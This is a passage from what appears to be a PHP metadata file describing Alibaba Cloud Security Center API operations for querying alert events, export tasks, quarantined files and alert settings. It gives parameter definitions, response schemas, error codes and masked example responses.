=> [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"DataSource\\": \\"aegis_suspicious_****\\",\\n \\"EventName\\": \\"WEBSHELL\\",\\n \\"InternetIp\\": \\"101.132.XX.XX\\",\\n \\"AlarmUniqueInfo\\": \\"8df914418f4211fb****\\",\\n \\"IntranetIp\\": \\"172.26.XX.XX\\",\\n \\"LastTime\\": \\" 2018-10-30 11:43:46 \\",\\n \\"OperateMsg\\": \\"success\\",\\n \\"Uuid\\": \\"bffb12c3-590a-4db2-b538-****\\",\\n \\"CanBeDealOnLine\\": true,\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF46038\\",\\n \\"EventTypeDesc\\": \\"Malicious Software-Variable Trojan\\",\\n \\"EventDesc\\": \\"The detection model found a suspicious Webshell file on your server, which may be a backdoor file implanted to maintain permissions after the attacker successfully invaded the website.\\",\\n \\"InstanceName\\": \\"ca_cpm_****\\",\\n \\"EventStatus\\": \\"1\\",\\n \\"SaleVersion\\": \\"1\\",\\n \\"OperateErrorCode\\": \\"quara.Succes\\",\\n \\"Level\\": \\"serious\\",\\n \\"Id\\": 11416624,\\n \\"Details\\": [\\n {\\n \\"Type\\": \\"html\\",\\n \\"Value\\": \\"getopt\\",\\n \\"NameDisplay\\": \\"Trojan Path\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeSuspEventDetail', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSuspEventDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSuspEventDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSuspEventExportInfo' => [ 'summary' => 'Queries the information about an export task of exceptions.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '106281', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], ], 'parameters' => [ [ 'name' => 'ExportId', 'in' => 'query', 'schema' => ['description' => 'The ID of the export task.'."\n" ."\n" .'> You can call the [ExportSuspEvents](~~ExportSuspEvents~~) operation to query the ID.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '123', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Link' => ['description' => 'The URL at which you can download the exported Excel file.'."\n", 'type' => 'string', 'example' => 'http://suspicious-xxxxxxx.oss-cn-shanghai.aliyuncs.com/xxxxxxxxxxx/suspicious_event_20221221_1671590525269.zip?Expires=1671594125&OSSAccessKeyId=yourAccessKeyID&Signature=xxxxxxxxxxxxxxxxxx', 'title' => ''], 'Type' => ['description' => 'The type of the export task. The value is fixed as suspiciousEvent.'."\n", 'type' => 'string', 'example' => 'suspiciousEvent', 'title' => ''], 'Progress' => ['description' => 'The progress percentage of the export task.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578AXXXXX', 'title' => ''], 'GmtCreate' => ['description' => 'The time when the export task was created.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '2022-12-20T15:18Z', 'title' => ''], 'FileName' => ['description' => 'The name of the exported file.'."\n", 'type' => 'string', 'example' => 'suspicious_event_20221221_1671590521234.zip', 'title' => ''], 'TotalCount' => ['description' => 'The total number of exceptions exported.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'GmtModified' => ['description' => 'The time when the export task was modified.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '2022-12-20T15:18Z', 'title' => ''], 'ExportStatus' => ['description' => 'The handling status for the exception. Valid values:'."\n" ."\n" .'* **exporting**: in progress'."\n" .'* **success**: successful'."\n" .'* **failed**: failed'."\n" .'* **pending**: pending'."\n", 'type' => 'string', 'example' => 'success', 'title' => ''], 'Id' => ['description' => 'The ID of the export task.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '11', 'title' => ''], 'Properties' => ['description' => 'The exported parameters of exceptions.'."\n", 'type' => 'string', 'example' => 'id,eventSubType,eventDetail,level,status,ip,instanceName,desc,lastTime,operateTime,note', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Link\\": \\"http://suspicious-xxxxxxx.oss-cn-shanghai.aliyuncs.com/xxxxxxxxxxx/suspicious_event_20221221_1671590525269.zip?Expires=1671594125&OSSAccessKeyId=yourAccessKeyID&Signature=xxxxxxxxxxxxxxxxxx\\",\\n \\"Type\\": \\"suspiciousEvent\\",\\n \\"Progress\\": 100,\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578AXXXXX\\",\\n \\"GmtCreate\\": 0,\\n \\"FileName\\": \\"suspicious_event_20221221_1671590521234.zip\\",\\n \\"TotalCount\\": 1,\\n \\"GmtModified\\": 0,\\n \\"ExportStatus\\": \\"success\\",\\n \\"Id\\": 11,\\n \\"Properties\\": \\"id,eventSubType,eventDetail,level,status,ip,instanceName,desc,lastTime,operateTime,note\\"\\n}","type":"json"}]', 'title' => 'DescribeSuspEventExportInfo', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSuspEventExportInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSuspEventExportInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSuspEventQuaraFiles' => [ 'summary' => 'Queries quarantined files by page.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '59.82.XX.XX', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.'."\n", 'type' => 'string', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the quarantined file that you want to query. Valid values:'."\n" ."\n" .'* **quaraFailed**: The file fails to be quarantined.'."\n" .'* **quaraDone**: The file is quarantined.'."\n" .'* **quaraing**: The file is being quarantined.'."\n" .'* **rollbackFailed**: The system fails to cancel quarantining the file.'."\n" .'* **rollbackDone**: The system cancelled quarantining the file.'."\n" .'* **rollbacking**: The system is cancelling quarantining the file.'."\n", 'type' => 'string', 'required' => false, 'example' => 'quaraDone', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset group.'."\n", 'type' => 'string', 'deprecated' => true, 'required' => false, 'example' => '10541428', 'title' => ''], ], [ 'name' => 'QuaraTag', 'in' => 'query', 'schema' => ['description' => 'The unique ID of the quarantined file.'."\n", 'type' => 'string', 'required' => false, 'example' => 'a31337789f64d39b2219733ec99f9af7', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return.'."\n", 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The ID of the request source. Set the value to **sas**.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'GroupingId', 'in' => 'query', 'schema' => ['description' => 'The ID of the server group to which the server belongs. The quarantined file is located on the server.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '11472451', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '32A73759-4C0F-4801-BE98-901223ACEE9A', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '38', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'QuaraFiles' => [ 'description' => 'An array that consists of the quarantined files.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The quarantined file.'."\n", 'type' => 'object', 'properties' => [ 'Link' => ['description' => 'The download link of the quarantined file.'."\n", 'type' => 'string', 'example' => 'https://xxx.xxx/xxx', 'title' => ''], 'Status' => ['description' => 'The status of the quarantined file. Valid values:'."\n" ."\n" .'* **quaraFailed**: The file fails to be quarantined.'."\n" .'* **quaraDone**: The file is quarantined.'."\n" .'* **quaraing**: The file is being quarantined.'."\n" .'* **rollbackFailed**: The system fails to cancel quarantining the file.'."\n" .'* **rollbackDone**: The system cancelled quarantining the file.'."\n" .'* **rollbacking**: The system is cancelling quarantining the file.'."\n", 'type' => 'string', 'example' => 'rollbackDone', 'title' => ''], 'EventName' => ['description' => 'The name of the event.'."\n", 'type' => 'string', 'example' => 'WEBSHELL', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server on which the quarantined file is located.'."\n", 'type' => 'string', 'example' => '47.XX.XX.131', 'title' => ''], 'Ip' => ['description' => 'The public IP address of the server on which the quarantined file is located.'."\n", 'type' => 'string', 'example' => '47.XX.XX.131', 'title' => ''], 'Tag' => ['description' => 'The unique ID of the event.'."\n", 'type' => 'string', 'example' => '228f890e56eae9eec6a42c7ea801b538', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the asset.'."\n", 'type' => 'string', 'example' => 'i-2ze9t1qp36n1436m****', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => '04a0e735-ad32-4835-b635-0458d77b****', 'title' => ''], 'EventType' => ['description' => 'The type of the event.'."\n", 'type' => 'string', 'example' => 'WebshellQuaraEventType', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server on which the quarantined file is located.'."\n", 'type' => 'string', 'example' => 'iZwz98dkiw3vbrtqrt5v****', 'title' => ''], 'Path' => ['description' => 'The path to the quarantined file on the server.'."\n", 'type' => 'string', 'example' => '/var/www/html/webshell-sample-master/others/defc3e21bab59e2a2ab49f7eda99f65f83d4d349.jpg', 'title' => ''], 'Md5' => ['description' => 'The MD5 hash value of the quarantined file.'."\n", 'type' => 'string', 'example' => '5ddebe926acc7ed39a664409bfd0ec10', 'title' => ''], 'Id' => ['description' => 'The ID of the quarantined file.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '26918', 'title' => ''], 'ModifyTime' => ['description' => 'The time when the quarantined file was last modified.'."\n", 'type' => 'string', 'example' => '2020-06-11 20:37:08', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server on which the quarantined file is located.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"RequestId\\": \\"32A73759-4C0F-4801-BE98-901223ACEE9A\\",\\n \\"TotalCount\\": 38,\\n \\"Count\\": 7,\\n \\"QuaraFiles\\": [\\n {\\n \\"Link\\": \\"https://xxx.xxx/xxx\\",\\n \\"Status\\": \\"rollbackDone\\",\\n \\"EventName\\": \\"WEBSHELL\\",\\n \\"InternetIp\\": \\"47.XX.XX.131\\",\\n \\"Ip\\": \\"47.XX.XX.131\\",\\n \\"Tag\\": \\"228f890e56eae9eec6a42c7ea801b538\\",\\n \\"InstanceId\\": \\"i-2ze9t1qp36n1436m****\\",\\n \\"Uuid\\": \\"04a0e735-ad32-4835-b635-0458d77b****\\",\\n \\"EventType\\": \\"WebshellQuaraEventType\\",\\n \\"InstanceName\\": \\"iZwz98dkiw3vbrtqrt5v****\\",\\n \\"Path\\": \\"/var/www/html/webshell-sample-master/others/defc3e21bab59e2a2ab49f7eda99f65f83d4d349.jpg\\",\\n \\"Md5\\": \\"5ddebe926acc7ed39a664409bfd0ec10\\",\\n \\"Id\\": 26918,\\n \\"ModifyTime\\": \\"2020-06-11 20:37:08\\",\\n \\"IntranetIp\\": \\"192.168.XX.XX\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeSuspEventQuaraFiles', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSuspEventQuaraFiles'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSuspEventQuaraFiles', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSuspEventUserSetting' => [ 'summary' => 'Queries the user settings for exceptions.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92216', 'abilityTreeNodes' => ['FEATUREsasDM8NT3'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the request. You do not need to specify this parameter.'."\n", 'type' => 'string', 'required' => false, 'example' => '127.0.XX.XX', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID. You do not need to specify this parameter.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '123', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The ID of the request source. Set the value to **sas**.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => '028CF634-5268-5660-9575-48C9ED6XXXXX', 'title' => ''], 'LevelsOn' => [ 'description' => 'An array that consists of the risk levels of alert notifications. Valid values:'."\n" ."\n" .'* **remind**'."\n" .'* **suspicious**'."\n" .'* **serious**'."\n", 'type' => 'array', 'items' => ['description' => 'The risk level of the unhandled alert. Valid values:'."\n" ."\n" .'* **remind**'."\n" .'* **suspicious**'."\n" .'* **serious**'."\n", 'type' => 'string', 'example' => 'suspicious,serious,remind', 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"028CF634-5268-5660-9575-48C9ED6XXXXX\\",\\n \\"LevelsOn\\": [\\n \\"suspicious,serious,remind\\"\\n ]\\n}","type":"json"}]', 'title' => 'DescribeSuspEventUserSetting', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSuspEventUserSetting'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSuspEventUserSetting', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSuspEvents' => [ 'summary' => 'Queries a list of alert events that are generated without aggregation.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92215', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Dealed', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the alert event is handled. Valid values:'."\n" ."\n" .'* **N**: unhandled'."\n" .'* **Y**: handled'."\n", 'type' => 'string', 'required' => false, 'example' => 'N', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the asset that is affected by the alert event.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ecs-xxx', 'title' => ''], ], [ 'name' => 'Levels', 'in' => 'query', 'schema' => ['description' => 'The severity of the alert event. Separate multiple severities with commas (,). Valid values:'."\n" ."\n" .'* **serious**'."\n" .'* **suspicious**'."\n" .'* **remind**'."\n", 'type' => 'string', 'required' => false, 'example' => 'serious', 'title' => ''], ], [ 'name' => 'ParentEventTypes', 'in' => 'query', 'schema' => ['description' => 'The alert type of the alert event. Valid values:'."\n" ."\n" .'* **Suspicious process**'."\n" .'* **Webshell**'."\n" .'* **Unusual logon**'."\n" .'* **Exception**'."\n" .'* **Sensitive file tampering**'."\n" .'* **Malicious process (cloud threat detection)**'."\n" .'* **Suspicious network connection**'."\n" .'* **Suspicious account**'."\n" .'* **Application intrusion event**'."\n" .'* **Cloud threat detection**'."\n" .'* **Precise defense**'."\n" .'* **Application whitelist**'."\n" .'* **Persistent webshell**'."\n" .'* **Web application threat detection**'."\n" .'* **Malicious script**'."\n" .'* **Threat intelligence**'."\n" .'* **Malicious network activity**'."\n" .'* **Cluster exception**'."\n" .'* **Webshell (on-premises threat detection)**'."\n" .'* **Vulnerability exploitation**'."\n" .'* **Malicious process (on-premises threat detection)**'."\n" .'* **Trusted exception**'."\n" .'* **Others**'."\n", 'type' => 'string', 'required' => false, 'example' => 'other', 'title' => ''], ], [ 'name' => 'EventNames', 'in' => 'query', 'schema' => ['description' => 'The subtype of the alert event. Separate multiple subtypes with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => 'WEBSHELL', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The name of the alert or the information about the asset.'."\n" ."\n" .'> Fuzzy search is supported. The asset information includes the name, public IP address, and private IP address of an asset.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'allowEmptyValue' => false, 'schema' => ['description' => 'The status of the alert event. Valid values:'."\n" ."\n" .'* **0**: all'."\n" .'* **1**: pending handling'."\n" .'* **2**: ignored'."\n" .'* **4**: confirmed'."\n" .'* **8**: marked as a false positive'."\n" .'* **16**: handling'."\n" .'* **32**: handled'."\n" .'* **64**: expired'."\n" .'* **128**: deleted'."\n" .'* **512**: automatically blocking'."\n" .'* **513**: automatically blocked'."\n", 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The number of entries per page. Default value: **20**. Maximum value: 100.'."\n", 'type' => 'string', 'required' => false, 'pattern' => '^\\d+$', 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'string', 'required' => false, 'pattern' => '^\\d+$', 'example' => '1', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'default' => 'zh', 'example' => 'zh', 'title' => ''], ], [ 'name' => 'AlarmUniqueInfo', 'in' => 'query', 'schema' => ['description' => 'The ID of the alert event.'."\n" ."\n" .'> To query the details of an alert event, you must specify the ID of the alert event. You can call the [DescribeSuspEvents](~~DescribeSuspEvents~~) operation to query the IDs of alert events.'."\n", 'type' => 'string', 'required' => false, 'example' => '8df914418f4211fb****', 'title' => ''], ], [ 'name' => 'UniqueInfo', 'in' => 'query', 'schema' => ['description' => 'The unique key of the alert.'."\n", 'type' => 'string', 'required' => false, 'example' => '73fc06fb175a7405697e402f52864****', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the alert event.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The data source of the alert event. Set the value to sas.'."\n", 'type' => 'string', 'required' => false, 'default' => 'sas', 'example' => 'sas', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The source of the alert.'."\n", 'type' => 'string', 'required' => false, 'example' => 'aegis_suspicious_file_v2', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset group to which the affected asset belongs.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '18768', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server on which the alert is detected. Separate multiple UUIDs with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => 'bb5d2484-f10e-450d-8917-3e79667e****,0e7c2fcd-7100-42c7-a21a-db6e4f32****', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the cluster of whose alert events you want to query.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c4af4fdf38a98496a9b63c2be5dae****', 'title' => ''], ], [ 'name' => 'ContainerFieldName', 'in' => 'query', 'schema' => ['description' => 'The key of the condition that is used to query alert events on containers. Valid values:'."\n" ."\n" .'* **instanceId**: the ID of the asset'."\n" .'* **appName**: the name of the application'."\n" .'* **clusterId**: the ID of the cluster'."\n" .'* **regionId**: the ID of the region'."\n" .'* **nodeName**: the name of the node'."\n" .'* **namespace**: the namespace'."\n" .'* **clusterName**: the name of the cluster'."\n" .'* **image**: the name of the image'."\n" .'* **imageRepoName**: the name of the image repository'."\n" .'* **imageRepoNamespace**: the namespace to which the image repository belongs'."\n" .'* **imageRepoTag**: the tag that is added to the image'."\n" .'* **imageDigest**: the digest of the image'."\n", 'type' => 'string', 'required' => false, 'example' => 'instanceId', 'title' => ''], ], [ 'name' => 'ContainerFieldValue', 'in' => 'query', 'schema' => ['description' => 'The value of the condition that is used to query alert events on containers.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ccf9769c22b844ff9b8d57417683b****', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The item that is used to search for the container. Valid values:'."\n" ."\n" .'* **containerId**: the ID of the container'."\n" .'* **uuid**: the UUID of the server'."\n" .'* **imageUuid**: the UUID of the image'."\n", 'type' => 'string', 'required' => false, 'example' => 'containerId', 'title' => ''], ], [ 'name' => 'TacticId', 'in' => 'formData', 'schema' => ['description' => 'The tactic ID of ATT\\&CK.'."\n", 'type' => 'string', 'required' => false, 'example' => 'TA0001', 'title' => ''], ], [ 'name' => 'OperateErrorCodeList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'An array that consists of the handling result codes of alert events.'."\n", 'type' => 'array', 'items' => ['description' => 'The handling result code of the alert event. Set the value in the following format: Operation type.Operation result code. The following operation types are supported:'."\n" ."\n" .'* **Common**: performs common operations.'."\n" .'* **deal**: handles the alert event.'."\n" .'* **ignore**: ignores the alert event.'."\n" .'* **offline_handled**: marks the alert event as handled.'."\n" .'* **mark\\_mis_info**: adds the alert event to the whitelist.'."\n" .'* **rm\\_mark\\_mis_info**: cancels adding the alert event to the whitelist.'."\n" .'* **quara**: quarantines the source file of the malicious process.'."\n" .'* **kill\\_and_quara**: terminates the malicious process and quarantines the source file.'."\n" .'* **kill_virus**: deletes the source file of the malicious process.'."\n" .'* **block_ip**: blocks the source IP address.'."\n" .'* **manual_handled**: marks the alert event as manually handled.'."\n" .'* **advance\\_mark\\_mis_info**: adds the alert event to the whitelist that is configured for precise defense.'."\n" .'* **advance\\_mark\\_mis_info.System**: automatically adds the alert event to the whitelist that is configured for precise defense.'."\n" .'* **advance\\_mark\\_mis_info.User**: manually adds the alert event to the whitelist that is configured for precise defense.'."\n" ."\n" .'The following handling result codes are supported:'."\n" ."\n" .'* **Success**: The operation is successful.'."\n" .'* **Failure**: The operation fails.'."\n" .'* **AgentOffline**: The agent is offline.', 'type' => 'string', 'required' => false, 'example' => 'ignore. Success', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'OperateTimeStart', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The timestamp when the handling operation starts.'."\n", 'type' => 'string', 'required' => false, 'example' => '2022-07-05 13:50:38'], ], [ 'name' => 'OperateTimeEnd', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The timestamp when the handling operation ends.'."\n", 'type' => 'string', 'required' => false, 'example' => '2022-07-06 13:50:38'], ], [ 'name' => 'TimeStart', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The start time when the alert event was last detected.'."\n", 'type' => 'string', 'required' => false, 'example' => '2022-07-05 13:50:38'], ], [ 'name' => 'TimeEnd', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The end time when the alert event was last detected.'."\n", 'type' => 'string', 'required' => false, 'example' => '2022-07-06 13:50:38'], ], [ 'name' => 'SortColumn', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The custom sorting field. Default value: **operateTime**. Valid values:'."\n" ."\n" .'* **lastTime**: the latest occurrence time.'."\n" .'* **operateTime**: the handling time.'."\n" ."\n" .'> This parameter takes effect if you set the **Dealed** parameter to Y.'."\n", 'type' => 'string', 'required' => false, 'example' => 'operateTime'], ], [ 'name' => 'SortType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The custom sorting order. Default value: **desc**. Valid values:'."\n" ."\n" .'* **asc**: the ascending order'."\n" .'* **desc**: the descending order'."\n" ."\n" .'> This parameter takes effect if you set the **Dealed** parameter to Y.'."\n", 'type' => 'string', 'required' => false, 'example' => 'desc'], ], [ 'name' => 'AssetsTypeList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The types of the assets.'."\n", 'type' => 'array', 'items' => ['description' => 'The type of the asset. Valid values:'."\n" ."\n" .'* **ECS**: Elastic Compute Service (ECS) instance'."\n" .'* **CONTAINER**: container'."\n" .'* **K8S**: Kubernetes cluster'."\n", 'type' => 'string', 'required' => false, 'example' => 'ECS', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member in the resource directory.'."\n" ."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to query the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '16670360956*****', 'title' => ''], ], [ 'name' => 'StrictMode', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable the strict alerting mode.'."\n" ."\n" .'* N: no'."\n" .'* Y: Yes'."\n", 'type' => 'string', 'required' => false, 'example' => 'Y', 'title' => ''], ], [ 'name' => 'MultiAccountActionType', 'in' => 'query', 'schema' => ['description' => 'The type of the accounts that you want to query. Default value: **0**. Valid values:'."\n" ."\n" .'* **0**: the current account.'."\n" .'* **1**: all accounts.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'SourceAliUids', 'in' => 'query', 'style' => 'simple', 'schema' => [ 'description' => 'The IDs of the Alibaba Cloud accounts within which alerts are generated.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the Alibaba Cloud account within which an alert is generated.'."\n", 'type' => 'integer', 'format' => 